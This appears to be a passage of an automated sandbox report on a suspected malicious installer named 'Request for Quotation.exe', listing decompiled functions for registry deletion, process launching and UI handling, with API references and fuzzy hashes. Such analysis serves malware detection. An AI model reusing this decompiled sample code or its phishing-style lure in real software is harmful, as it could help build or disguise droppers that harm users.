                                                                                						_t90 = _t90 & _t77;
                                                                                						_t87 = _t87 & _v12;
                                                                                						goto L59;
                                                                                					}
                                                                                					__eflags = _t90 | _t87;
                                                                                					if((_t90 | _t87) == 0) {
                                                                                						goto L56;
                                                                                					}
                                                                                					__eflags = _t77 | _v12;
                                                                                					if((_t77 | _v12) == 0) {
                                                                                						goto L56;
                                                                                					}
                                                                                					goto L49;
                                                                                				}
                                                                                				_t70 = _t69 - 4;
                                                                                				if(_t70 == 0) {
                                                                                					_t48 = E6F712D40(_t90, _t87, _t77, _v12);
                                                                                					goto L58;
                                                                                				} else {
                                                                                					_t71 = _t70 - 1;
                                                                                					if(_t71 == 0) {
                                                                                						_t90 = _t90 + _t77;
                                                                                						asm("adc edi, [ebp-0x8]");
                                                                                					} else {
                                                                                						if(_t71 == 0) {
                                                                                							_t90 = _t90 - _t77;
                                                                                							asm("sbb edi, [ebp-0x8]");
                                                                                						}
                                                                                					}
                                                                                					goto L59;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FreeGlobal
                                                                                • String ID:
                                                                                • API String ID: 2979337801-0
                                                                                • Opcode ID: 578c0b6e3eaa40bb8ff17867c236bdf059bc26c0eceda2eb526b78d42e3d51ac
                                                                                • Instruction ID: 9dccba2efb26303ab371e67523ed54f4d7092c88b321d9feb07b2a9efb0943ba
                                                                                • Opcode Fuzzy Hash: 578c0b6e3eaa40bb8ff17867c236bdf059bc26c0eceda2eb526b78d42e3d51ac
                                                                                • Instruction Fuzzy Hash: 9151D43190C198AB9B00CFB8C7449AEBFBDAB66359F0C426BD410AE140C2F1A94D87A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 48%
                                                                                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				char _v276;
                                                                                				void* _t27;
                                                                                				signed int _t33;
                                                                                				intOrPtr* _t35;
                                                                                				signed int _t45;
                                                                                				signed int _t46;
                                                                                				signed int _t47;
                                                                                
                                                                                				_t46 = _a12;
                                                                                				_t47 = _t46 & 0x00000300;
                                                                                				_t45 = _t46 & 0x00000001;
                                                                                				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                				if(_t27 == 0) {
                                                                                					if((_a12 & 0x00000002) == 0) {
                                                                                						L3:
                                                                                						_push(0x105);
                                                                                						_push( &_v276);
                                                                                						_push(0);
                                                                                						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                							__eflags = _t45;
                                                                                							if(__eflags != 0) {
                                                                                								L10:
                                                                                								RegCloseKey(_v8);
                                                                                								return 0x3eb;
                                                                                							}
                                                                                							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                							__eflags = _t33;
                                                                                							if(_t33 != 0) {
                                                                                								break;
                                                                                							}
                                                                                							_push(0x105);
                                                                                							_push( &_v276);
                                                                                							_push(_t45);
                                                                                						}
                                                                                						RegCloseKey(_v8);
                                                                                						_t35 = E00406656(3);
                                                                                						if(_t35 != 0) {
                                                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                                                						}
                                                                                						return RegDeleteKeyA(_a4, _a8);
                                                                                					}
                                                                                					_v12 = 0;
                                                                                					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                						goto L10;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                				return _t27;
                                                                                			}













                                                                                APIs
                                                                                • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseEnum$DeleteValue
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00401D65(void* __ebx, void* __edx) {
                                                                                				struct HWND__* _t30;
                                                                                				CHAR* _t38;
                                                                                				void* _t48;
                                                                                				void* _t53;
                                                                                				signed int _t55;
                                                                                				signed int _t58;
                                                                                				long _t61;
                                                                                				void* _t65;
                                                                                
                                                                                				_t53 = __ebx;
                                                                                				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                				} else {
                                                                                					E00402BAC(2);
                                                                                					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                				}
                                                                                				_t55 =  *(_t65 - 0x1c);
                                                                                				 *(_t65 + 8) = _t30;
                                                                                				_t58 = _t55 & 0x00000004;
                                                                                				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                				if((_t55 & 0x00010000) == 0) {
                                                                                					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                				} else {
                                                                                					_t38 = E00402BCE(0x11);
                                                                                				}
                                                                                				 *(_t65 - 8) = _t38;
                                                                                				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                				asm("sbb edi, edi");
                                                                                				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                					DeleteObject(_t48);
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                					_push(_t61);
                                                                                					E004061AB();
                                                                                				}
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                				return 0;
                                                                                			}












                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E00401E35(intOrPtr __edx) {
                                                                                				void* __esi;
                                                                                				int _t9;
                                                                                				signed char _t15;
                                                                                				struct HFONT__* _t18;
                                                                                				intOrPtr _t30;
                                                                                				struct HDC__* _t31;
                                                                                				void* _t33;
                                                                                				void* _t35;
                                                                                
                                                                                				_t30 = __edx;
                                                                                				_t31 = GetDC( *(_t35 - 8));
                                                                                				_t9 = E00402BAC(2);
                                                                                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                				ReleaseDC( *(_t35 - 8), _t31);
                                                                                				 *0x40b860 = E00402BAC(3);
                                                                                				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                				 *0x40b867 = 1;
                                                                                				 *0x40b864 = _t15 & 0x00000001;
                                                                                				 *0x40b865 = _t15 & 0x00000002;
                                                                                				 *0x40b866 = _t15 & 0x00000004;
                                                                                				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                				_t18 = CreateFontIndirectA(0x40b850);
                                                                                				_push(_t18);
                                                                                				_push(_t33);
                                                                                				E004061AB();
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                				return 0;
                                                                                			}












                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401E38
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                • ReleaseDC.USER32 ref: 00401E6B
                                                                                • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                				char _v36;
                                                                                				char _v68;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t21;
                                                                                				signed int _t22;
                                                                                				void* _t29;
                                                                                				void* _t31;
                                                                                				void* _t32;
                                                                                				void* _t41;
                                                                                				signed int _t43;
                                                                                				signed int _t47;
                                                                                				signed int _t50;
                                                                                				signed int _t51;
                                                                                				signed int _t53;
                                                                                
                                                                                				_t21 = _a16;
                                                                                				_t51 = _a12;
                                                                                				_t41 = 0xffffffdc;
                                                                                				if(_t21 == 0) {
                                                                                					_push(0x14);
                                                                                					_pop(0);
                                                                                					_t22 = _t51;
                                                                                					if(_t51 < 0x100000) {
                                                                                						_push(0xa);
                                                                                						_pop(0);
                                                                                						_t41 = 0xffffffdd;
                                                                                					}
                                                                                					if(_t51 < 0x400) {
                                                                                						_t41 = 0xffffffde;
                                                                                					}
                                                                                					if(_t51 < 0xffff3333) {
                                                                                						_t50 = 0x14;
                                                                                						asm("cdq");
                                                                                						_t22 = 1 / _t50 + _t51;
                                                                                					}
                                                                                					_t23 = _t22 & 0x00ffffff;
                                                                                					_t53 = _t22 >> 0;
                                                                                					_t43 = 0xa;
                                                                                					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                				} else {
                                                                                					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                					_t47 = 0;
                                                                                				}
                                                                                				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
                                                                                				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
                                                                                				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
                                                                                			}




















                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                • wsprintfA.USER32 ref: 00404BC0
                                                                                • SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00401C2E(intOrPtr __edx) {
                                                                                				int _t29;
                                                                                				long _t30;
                                                                                				signed int _t32;
                                                                                				CHAR* _t35;
                                                                                				long _t36;
                                                                                				int _t41;
                                                                                				signed int _t42;
                                                                                				int _t46;
                                                                                				int _t56;
                                                                                				intOrPtr _t57;
                                                                                				struct HWND__* _t61;
                                                                                				void* _t64;
                                                                                
                                                                                				_t57 = __edx;
                                                                                				_t29 = E00402BAC(3);
                                                                                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                				 *(_t64 - 8) = _t29;
                                                                                				_t30 = E00402BAC(4);
                                                                                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                				 *(_t64 + 8) = _t30;
                                                                                				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                				}
                                                                                				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                				}
                                                                                				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                				_push(1);
                                                                                				if(__eflags != 0) {
                                                                                					_t59 = E00402BCE();
                                                                                					_t32 = E00402BCE();
                                                                                					asm("sbb ecx, ecx");
                                                                                					asm("sbb eax, eax");
                                                                                					_t35 =  ~( *_t31) & _t59;
                                                                                					__eflags = _t35;
                                                                                					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                					goto L10;
                                                                                				} else {
                                                                                					_t61 = E00402BAC();
                                                                                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                					_t41 = E00402BAC(2);
                                                                                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                					if(__eflags == 0) {
                                                                                						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                						L10:
                                                                                						 *(_t64 - 0xc) = _t36;
                                                                                					} else {
                                                                                						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                						asm("sbb eax, eax");
                                                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                					}
                                                                                				}
                                                                                				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                					_push( *(_t64 - 0xc));
                                                                                					E004061AB();
                                                                                				}
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                				return 0;
                                                                                			}
















                                                                                APIs
                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405BE5(CHAR* _a4) {
                                                                                				CHAR* _t7;
                                                                                
                                                                                				_t7 = _a4;
                                                                                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                					lstrcatA(_t7, 0x40a014);
                                                                                				}
                                                                                				return _t7;
                                                                                			}





                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-3081826266
                                                                                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040396E() {
                                                                                				void* _t1;
                                                                                				void* _t2;
                                                                                				signed int _t11;
                                                                                
                                                                                				_t1 =  *0x40a018; // 0x2cc
                                                                                				if(_t1 != 0xffffffff) {
                                                                                					CloseHandle(_t1);
                                                                                					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                				}
                                                                                				_t2 =  *0x40a01c; // 0x2d0
                                                                                				if(_t2 != 0xffffffff) {
                                                                                					CloseHandle(_t2);
                                                                                					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                					_t11 =  *0x40a01c;
                                                                                				}
                                                                                				E004039CB();
                                                                                				return E00405A15(_t11, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsc77A8.tmp", 7);
                                                                                			}







                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                • CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                • C:\Users\user\AppData\Local\Temp\nsc77A8.tmp, xrefs: 004039A4
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc77A8.tmp
                                                                                • API String ID: 2962429428-3018440030
                                                                                • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                				int _t15;
                                                                                				long _t16;
                                                                                
                                                                                				_t15 = _a8;
                                                                                				if(_t15 != 0x102) {
                                                                                					if(_t15 != 0x200) {
                                                                                						_t16 = _a16;
                                                                                						L7:
                                                                                						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
                                                                                							_push(_t16);
                                                                                							_push(6);
                                                                                							 *0x42a8a4 = _t16;
                                                                                							E00404CA4();
                                                                                						}
                                                                                						L11:
                                                                                						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
                                                                                					}
                                                                                					if(IsWindowVisible(_a4) == 0) {
                                                                                						L10:
                                                                                						_t16 = _a16;
                                                                                						goto L11;
                                                                                					}
                                                                                					_t16 = E00404C24(_a4, 1);
                                                                                					_t15 = 0x419;
                                                                                					goto L7;
                                                                                				}
                                                                                				if(_a12 != 0x20) {
                                                                                					goto L10;
                                                                                				}
                                                                                				E0040431D(0x413);
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00405317
                                                                                • CallWindowProcA.USER32 ref: 00405368
                                                                                  • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                				int _v8;
                                                                                				long _t21;
                                                                                				long _t24;
                                                                                				char* _t30;
                                                                                
                                                                                				asm("sbb eax, eax");
                                                                                				_v8 = 0x400;
                                                                                				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                				_t30 = _a16;
                                                                                				if(_t21 != 0) {
                                                                                					L4:
                                                                                					 *_t30 =  *_t30 & 0x00000000;
                                                                                				} else {
                                                                                					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                					_t21 = RegCloseKey(_a20);
                                                                                					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                						goto L4;
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}








                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseQueryValue
                                                                                • String ID: Call
                                                                                • API String ID: 3356406503-1824292864
                                                                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004058EC(CHAR* _a4) {
                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                				int _t7;
                                                                                
                                                                                				0x42c0c0->cb = 0x44;
                                                                                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
                                                                                				if(_t7 != 0) {
                                                                                					CloseHandle(_v20.hThread);
                                                                                					return _v20.hProcess;
                                                                                				}
                                                                                				return _t7;
                                                                                			}






                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                Strings
                                                                                • Error launching installer, xrefs: 004058FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                                • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405C2C(char* _a4) {
                                                                                				char* _t3;
                                                                                				char* _t5;
                                                                                
                                                                                				_t5 = _a4;
                                                                                				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                				while( *_t3 != 0x5c) {
                                                                                					_t3 = CharPrevA(_t5, _t3);
                                                                                					if(_t3 > _t5) {
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				 *_t3 =  *_t3 & 0x00000000;
                                                                                				return  &(_t3[1]);
                                                                                			}






                                                                                APIs
                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405C32
                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405C40
                                                                                Strings
                                                                                Memory Dump Source
